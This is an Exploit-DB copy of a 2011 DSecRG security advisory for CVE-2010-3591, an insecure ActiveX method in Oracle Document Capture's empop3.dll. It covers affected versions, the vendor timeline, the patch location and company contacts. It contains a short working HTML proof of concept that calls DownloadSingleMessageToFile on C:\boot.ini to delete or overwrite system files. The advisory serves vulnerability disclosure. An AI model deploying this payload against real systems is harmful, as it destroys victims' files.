Oracle Document Capture - 'empop3.dll' Insecure Methods

EDB-ID:

16055




Platform:

Windows

Date:

2011-01-26


Source: http://packetstormsecurity.org/files/view/97868/DSECRG-11-005.txt

ActiveX components contain insecure methods.

Digital Security Research Group [DSecRG] Advisory DSECRG-11-005 (internal #DSECRG-00154) 


Application:            Oracle Document Capture
Versions Affected:      Release 10gR3
Vendor URL:             www.oracle.com
Bugs:                   insecure method, File overwriting, File deleting
Exploits:               YES
Reported:               22.03.2010
Vendor response:        31.03.2010
Date of Public Advisory:24.01.2011
CVE-number:             CVE-2010-3591
Author:                 Evdokimov Dmitriy from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)



Description
***********

Oracle Document Capture contains ActiveX components that contains insecure methods in empop3.dll


Details
*******


Oracle Document Capture contains ActiveX component EMPOP3Lib (empop3.dll) Lib GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24}

which is contains insecure method "DownloadSingleMessageToFile" that can delete any file in system. 

Class EasyMailPop3
GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24}
Number of Interfaces: 1
Default Interface: IPOP3Main
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False



Details
*******

Attacker can construct html page which call vulnerable function "DownloadSingleMessageToFile" from ActiveX component empop3.dll

Example:

<HTML>
         <HEAD>
         <TITLE>DSecRG</TITLE>
         </HEAD>
         <BODY>
         
         <OBJECT id='eds' classid='clsid:F647CBE5-3C01-402A-B3F0-502A77054A24'></OBJECT>
 
         <SCRIPT>
                 
         function Exploit(){
                 eds.DownloadSingleMessageToFile(1,"C:\\boot.ini",1);                          
         }
         Exploit();
 
         </SCRIPT>
</BODY>
</HTML>


References
**********

http://dsecrg.com/pages/vul/show.php?id=305
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html




Fix Information
*************

Information was published in CPU Jan 2011.
All customers can download CPU patches following instructions from: 

http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html


About
*****

Digital Security: 

Is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.

Digital Security Research Group:

International subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product "ERPSCAN security suite for SAP NetWeaver" and service "ERPSCAN Online" which can help customers to perform automated security assessments and compliance checks for SAP solutions.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.erpscan.com




Polyakov Alexandr. PCI QSA,PA-QSA
CTO Digital Security
Head of DSecRG
______________________
DIGITAL SECURITY
phone:  +7 812 703 1547
        +7 812 430 9130
e-mail: a.polyakov@dsec.ru  

www.dsec.ru
www.dsecrg.com www.dsecrg.ru
www.erpscan.com www.erpscan.ru
www.pcidssru.com www.pcidss.ru


-----------------------------------
This message and any attachment are confidential and may be privileged or otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure 
is strictly prohibited. If you have received this message in error, please notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding 
statements by e-mail unless otherwise agreed. 
-----------------------------------